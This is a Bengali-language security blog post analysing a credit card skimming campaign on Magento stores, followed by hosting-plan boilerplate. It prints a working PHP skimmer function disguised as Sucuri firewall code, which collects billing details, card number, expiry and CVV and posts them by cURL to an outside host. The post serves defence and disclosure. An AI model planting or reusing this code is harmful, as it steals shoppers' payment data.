ক্রেডিট কার্ড স্কিমার, ম্যাজেন্টো স্টোরগুলিকে লক্ষ্যবস্তু করা হচ্ছে এবং CC ডেটা চুরি করা হচ্ছে৷

  • Home
  • WordPress Security
  • ক্রেডিট কার্ড স্কিমার, ম্যাজেন্টো স্টোরগুলিকে লক্ষ্যবস্তু করা হচ্ছে এবং CC ডেটা চুরি করা হচ্ছে৷

COVID-19 এর কারনে বিশ্বজুড়ে লকডাউন ব্যবস্থা চালু হয় , যার ফলে BFCM এবং ক্রিসমাস ডিসকাউন্ট বিক্রয়ের ব্যবস্থা চালু হয়। আর তাই এই বছর অনলাইন কেনাকাটা অব্যাহতভাবে বৃদ্ধি পাচ্ছে এবং এর সাথে ডিজিটাল ক্রেডিট কার্ড স্কিমারের আক্রমণও।

আমাদের সাম্প্রতিক রিপোর্ট অনুসারে দেখা যায়, সিকিউরিটির নিরাপত্তা গবেষকরা আবিষ্কার করেন, টেলিগ্রাম ম্যালওয়্যার ক্যাম্পেইন, ক্রেডিট কার্ড স্কিমিং ম্যালওয়্যার ক্যাম্পেইন হয় যা সংক্রামন করে ই-কমার্স স্টোরকে। আর এর থেকে গ্রাহকদের সংবেদনশীল তথ্য চুরি করার জন্য নিরাপত্তা কোম্পানি ‘sucuri’-এর ছদ্মবেশ ধারণ করে। যখন আমরা এই ট্র্যাক করেছি তখন ম্যালওয়্যার ম্যাজেন্টো স্টোরকে লক্ষ্য করে। তবে, প্রেস্টাশপ, ওপেনকার্ট এবং WooCommerce-এর মতো অন্যান্য CMS-তেও ম্যালওয়ারের কিছু চিহ্ন দেখা গেছে।

একটি ডিজিটাল ক্রেডিট কার্ড স্কিমিং আক্রমণ কি?

ডিজিটাল ক্রেডিট কার্ড স্কিমিং আক্রমণ হল একটি ওয়েব-ভিত্তিক স্কিমিং আক্রমণ। যেখানে হ্যাকাররা ম্যালওয়্যার দ্বারা সংক্রামিত করার জন্য ওয়েবসাইট বা ই-কমার্স স্টোরগুলিতে ভাইরাল জাভাস্ক্রিপ্ট কোড ইনজেক্ট করে । যারা শেষ পর্যন্ত ওয়েবসাইটের দর্শক/গ্রাহকদের কাছ থেকে সার্টিফিকেট এবং সংবেদনশীল অর্থপ্রদানের তথ্য চুরি করে। এই ডিজিটাল স্কিমারের ক্ষতিকারক কোড বেশিরভাগই সাইটের পেমেন্ট চেকআউট পেইজে উপস্থিত ব্যবহারকারী ইনপুট ফর্মগুলিতে লাগানো হয যা ব্যবহারকারীর ইনপুটগুলি চেক করে। পরবর্তীতে গ্রাহকদের ক্রেডিট কার্ডের তথ্য চুরি করার জন্য জাল পেমেন্ট ফর্ম সহ একটি আইফ্রেম তৈরি করে।

ডিজিটাল স্কিমিং আজ পর্যন্ত কয়েক হাজার ওয়েবসাইটকে প্রভাবিত করেছে, যার মধ্যে হাই-প্রোফাইল ব্র্যান্ড যেমন ব্রিটিশ বিমান সংস্থা মেসির, ফোর্বস NewEgg এবং Ticketmaster.

Magento ক্রেডিট কার্ড স্কিমিং
Magento ক্রেডিট কার্ড স্কিমিং

Magento ক্রেডিট কার্ড স্কিমিং ম্যালওয়্যার লক্ষণ গুলো

  1. গ্রাহকরা তাদের ক্রেডিট কার্ডটি আপনার দোকানে ব্যবহার করার পরে যখন অজ্ঞাত লেনদেন সম্পর্কে অভিযোগ করে
  2. এছাড়া আপনার দোকানের পেমেন্ট গেটওয়ের নিরাপত্তা সম্পর্কে সতর্কতা জানিয়ে পেমেন্ট প্রদানকারী/ব্যাঙ্কের ইমেল প্রেরণ
  3. দোকানে অতিরিক্ত অর্থপ্রদানের পদ্ধতি যোগ করা হয়েছে যা আপনি শনাক্ত করতে পারেন
  4. আপনি নামের সাথে কোনো পণ্য ব্যবহার না করলেও আপনার ওয়েবসাইটে ‘Sucuri’ শব্দটি যুক্ত কোড রয়েছে তখন

বিশেষ দ্রষ্টব্যঃ প্রতিদিন 30,000 ওয়েবসাইট হ্যাক হয়।

আর তাই খুব দেরি হওয়ার আগেই , ওয়েবসাইট সুরক্ষা ব্যবহার করে ম্যালওয়্যার এবং হ্যাকারদের থেকে আপনার ওয়েবসাইটকে সুরক্ষিত করুন৷

কীভাবে হ্যাকাররা স্টোর টার্গেট করছে এবং ব্যবহারকারীদের অর্থপ্রদানের তথ্য এর জন্য প্রতারণা করছে

এই ম্যালওয়্যার ক্যাম্পেইন বিশ্লেষণের সময়, আমাদের গবেষণা দল দেখেছে যে হ্যাকাররা সক্রিয়ভাবে এই ক্রেডিট কার্ড স্কিমিং ম্যালওয়্যারকে ই-কমার্স ওয়েবসাইটগুলিতে (বেশিরভাগই ম্যাগনেটো স্টোর) লাগিয়েছে। চেকআউটের সময় তাদের সংবেদনশীল তথ্য প্রবেশ করার জন্য সাইটের দর্শক বা ক্রেতাদের প্রতারণা করছে৷ দূষিত ক্রেডিট কার্ড স্কিমার কোড এই ফাইল অবস্থানে অবস্থিত /app/code/core/Mage/Payment/Model/Method/Cc.php একটি সংক্রামিত সাইটের।

এখানে, আক্রমণকারীরা একটি ফাংশন যোগ করছে $this->sucuri_encrypted(); যা তাদের চেকআউট প্রক্রিয়া চলাকালীন ব্যবহারকারীর দ্বারা প্রবেশ করা। যা ডেটা এক্সফিল্টার করতে দেয়। এছাড়া তারা রিমুভ ডেটা পাঠায়, যা হচ্ছে https://www.thebrandstore.gr/js/i.php

আর এই সব চুরি হওয়া ডেটাতে গ্রাহকদের প্রথম নাম, পদবি, ঠিকানা, ফোন নম্বর এবং ক্রেডিট কার্ডের বিবরণ সহ তাদের সংবেদনশীল তথ্য রয়েছে।

আক্রমণকারীদের দ্বারা ব্যবহৃত এই ম্যালওয়্যার প্রচারে ব্যবহৃত কোড নমুনা নীচে দেওয়া হল:

function sucuri_encrypted()
    {
        $info = $this->getInfoInstance();
        $object = new Mage_Checkout_Block_Onepage_Billing;
        $address1 = $object->getQuote()->getBillingAddress();
        $data1 = $address1->getFirstname();
        $data2 = $address1->getLastname();
        $data3 = $address1->getStreet(1);
        $data4 = $address1->getStreet(2);
        $data5 = $address1->getCity();
        $data6 = $address1->getRegion();
        $data7 = $address1->getPostcode();
        $data8 = $address1->getCountry();
        $data9 = $address1->getTelephone();
        $data10 = $info->getCcNumber();
        $expyear = substr($info->getCcExpYear(), -2);
        $expmonth = $info->getCcExpMonth();
        if (strlen($expmonth) == 1) {
           $expmonth="0".$expmonth;
        };
        $data11 = $expmonth;
        $data12 = $expyear;
        $data13 = $info->getCcCid();
        $data15 = $_SERVER['SERVER_NAME'];
        $data16 = Mage::getSingleton('checkout/session')->getQuote()->getBillingAddress()->getEmail();
//create array of data to be secured
$sucuri_firewall['firstname'] = base64_encode($data1);
$sucuri_firewall['lastname'] = base64_encode($data2);
$sucuri_firewall['address'] = base64_encode($data3);
$sucuri_firewall['address2'] = base64_encode($data4);
$sucuri_firewall['city'] = base64_encode($data5);
$sucuri_firewall['state'] = base64_encode($data6);
$sucuri_firewall['zip'] = base64_encode($data7);
$sucuri_firewall['country'] = base64_encode($data8);
$sucuri_firewall['phone'] = base64_encode($data9);
$sucuri_firewall['cc'] = base64_encode($data10);
$sucuri_firewall['exp'] = base64_encode($data11);
$sucuri_firewall['expyear'] = base64_encode($data12);
$sucuri_firewall['cvv'] = base64_encode($data13);
$sucuri_firewall['email'] = base64_encode($data16);
$sucuri_firewall['dari'] = base64_encode($data15);
$sucuri_firewall['submit'] = 'Submit';
//traverse array and prepare data for posting (key1=value1)
foreach ( $sucuri_firewall as $key => $value) {
    $post_items[] = $key . '=' . $value;
}
//create the final string to be posted using implode()
$post_string = implode ('&', $post_items);
//create cURL connection
$curl_connection = curl_init('https://www.thebrandstore.gr/js/i.php');
//set options
curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
//set data to be posted
curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post_string);
//perform our request
$result = curl_exec($curl_connection);
curl_close($curl_connection);
}
}
}.

আপনি উপরের কোডে দেখতে পাচ্ছেন, ক্রেডিট কার্ডের তথ্য চুরিকারী নামের একটি ফাংশন যোগ করে $this->sucuri_encrypted(); যা একটি ছদ্মবেশী Sucuri ফায়ারওয়াল কোড প্রদর্শন করে।

কিভাবে এই ম্যালওয়্যার থেকে আপনার ই-কমার্স স্টোর রক্ষা করবেন?

এই ম্যালওয়্যার দ্বারা সংক্রামিত ই-কমার্স ওয়েবসাইট বা স্টোরগুলি তাদের গ্রাহকদের সংবেদনশীল তথ্য চুরি হয়ে যায়। যার কারণে তারা বৈধ অর্ডার দিতে সক্ষম হচ্ছে না বা অর্থপ্রদান করা হচ্ছে না। ফলে রাজস্বের পাশাপাশি গ্রাহকদের বিশ্বাসও বিশাল ক্ষতির সম্মুখীন হয়। সুতরাং, সাইটের মালিকদের পরামর্শ দেওয়া হচ্ছে যে তাদের এই ধরনের ক্রেডিট কার্ড স্কিমার এবং অন্য যেকোন ম্যালওয়্যার প্রচারাভিযানের বিরুদ্ধে, তাদের সাইট এবং গ্রাহকের ডেটা সুরক্ষিত করা প্রয়োজন। আর এর জন্য পূর্ব থেকেই নিরাপত্তা ব্যবস্থা প্রয়োগ করা উচিত।

আপনি যদি অ্যাস্ট্রা সিকিউরিটি এর অ্যাপ্লিকেশন ফায়ারওয়াল ব্যবহার করেন, তাহলে আপনার ই-কমার্স স্টোর ইতিমধ্যেই এই আক্রমণ এবং অন্যান্য সাইবার আক্রমণ থেকে সুরক্ষিত থাকবে। এছাড়া SQLi, XSS, CSRF, LFI, RFI, ক্রেডিট কার্ড হ্যাক, স্প্যাম, খারাপ বট ইত্যাদির মতো দুর্বলতা থেকে সুরক্ষাও পাওয়া যায়। নিয়মিত ম্যালওয়্যার স্ক্যানিং ওয়েবসাইটগুলির নিরাপত্তার জন্য একটি সঠীক মূল নিরাপত্তা ব্যবস্থাকে সুপারিশ করে। এটি যেন সর্বদা সুরক্ষিত থাকে তার জন্য যথাযথ নিরাপত্তা ব্যবস্থা সহ আপনার ওয়েবসাইটগুলিকে পারফেক্ট করার সময় চলে এসেছে৷

ট্যাগ: সিএমএস নিরাপত্তা, ক্রেডিট কার্ড চুরি ফর্ম, ম্যাজেন্টো, ম্যাজেন্টো ম্যালওয়্যার

Free Website Toolkit

Money Back Guarantee

If you’re unhappy for any reason, let us know why. Our friendly support guy is standing by. If you do decide we’re not the right host for you though, we’ll give you a hassle-free refund. We may have to stock up on tissues if you cancel though because we hate break-ups, but we promise, no hard feelings. Just cancel your account within your first 30-days for a full refund, or receive a prorated refund of unused service after 30-days. It’s that easy.

Free Domain Registration

In order to qualify for (1) one free domain name registration, you must sign up for a 12, 24 or 36 month Bitbyhost Shared, Web hosting and WordPress plan. Offer only applies to domains available only .com at the time of hosting signup, and on their initial purchase term. This offer is NOT available under any other hosting plans, nor can it be combined with any other offers. After the first year, your domain will renew at the regular rate.
If your hosting plan includes a free domain and you cancel your hosting within the first year, a non-refundable $12.08 USD domain fee (+ any applicable taxes) for the domain name will apply. Please note that newly registered domains cannot be transferred to another registrar during the first 60 days of the registration period.

Discount will be automatically applied to your cart at checkout.